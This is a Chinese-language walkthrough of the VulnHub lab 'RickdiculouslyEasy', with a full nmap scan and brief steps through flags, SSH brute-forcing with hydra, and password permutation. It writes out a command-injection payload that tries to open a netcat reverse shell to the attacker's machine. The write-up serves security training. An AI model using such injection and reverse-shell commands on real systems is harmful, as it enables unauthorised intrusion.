RICKDICULOUSLYEASY 1

https://download.vulnhub.com/rickdiculouslyeasy/RickdiculouslyEasy.zip

靶场IP:192.168.32.12

扫描对外端口服务

┌──(root㉿kali)-[/tmp]
└─# nmap -sV -p1-65535 192.168.32.12
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-08 04:54 EDT
Nmap scan report for 192.168.32.12
Host is up (0.00018s latency).
Not shown: 65528 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh?
80/tcp    open  http    Apache httpd 2.4.27 ((Fedora))
9090/tcp  open  http    Cockpit web service 161 or earlier
13337/tcp open  unknown
22222/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
60000/tcp open  unknown
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.92%I=7%D=9/8%Time=6319ADC4%P=x86_64-pc-linux-gnu%r(NULL,
SF:42,"Welcome\x20to\x20Ubuntu\x2014\.04\.5\x20LTS\x20\(GNU/Linux\x204\.4\
SF:.0-31-generic\x20x86_64\)\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port13337-TCP:V=7.92%I=7%D=9/8%Time=6319ADC4%P=x86_64-pc-linux-gnu%r(NU
SF:LL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port60000-TCP:V=7.92%I=7%D=9/8%Time=6319ADCA%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\.\
SF:.\n#\x20")%r(ibm-db2,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20rev
SF:erse\x20shell\.\.\.\n#\x20");
MAC Address: 08:00:27:73:25:78 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.88 seconds

FTP匿名登录

访问80端口

image-20220908165451364

访问9090端口,获得FLAG {There is no Zeus, in your face!} - 10 Points

image-20220908165902877

访问13337端口

访问60000端口

爆破80web目录,发现/robots.txt

访问/robots.txt

发现/cgi-bin/tracertool.cgi是命令注入漏洞

image-20220908170557929

启动一个监听器并尝试; nc -n <kali-ip> <kali-port> -e /usr/bin/bash。不幸的是,没有shell反弹!看起来某种防火墙,正在阻止出站连接。

查看/var/www/html目录,找到passwords目录

image-20220908171025487

获取用户用来爆破ssh

image-20220908171313955

爆破22222端口,发现用户Summer

image-20220908171515631

ssh登录

image-20220908171634565

查看图片文件,发现密码:Meeseek

解压压缩包

使用找到safe二进制文件的提示,我查找了 Rick 的旧乐队 - The Flesh Curtains。我还需要根据这些单词按特定顺序进行一些密码排列:

  • 1个大写字符

  • 然后,1个号码

  • 最后,乐队的话之一——Flesh或者Curtains

使用 Hashcat 进行排列maskprocessor

现在使用我的单词表 – rick,我将尝试通过以下方式暴力破解 SSH hydra

而且,一段时间后我受到了打击:P7Curtains

image-20230208160340250
上一页Readme 1下一页Sar:1

最后更新于

这有帮助吗?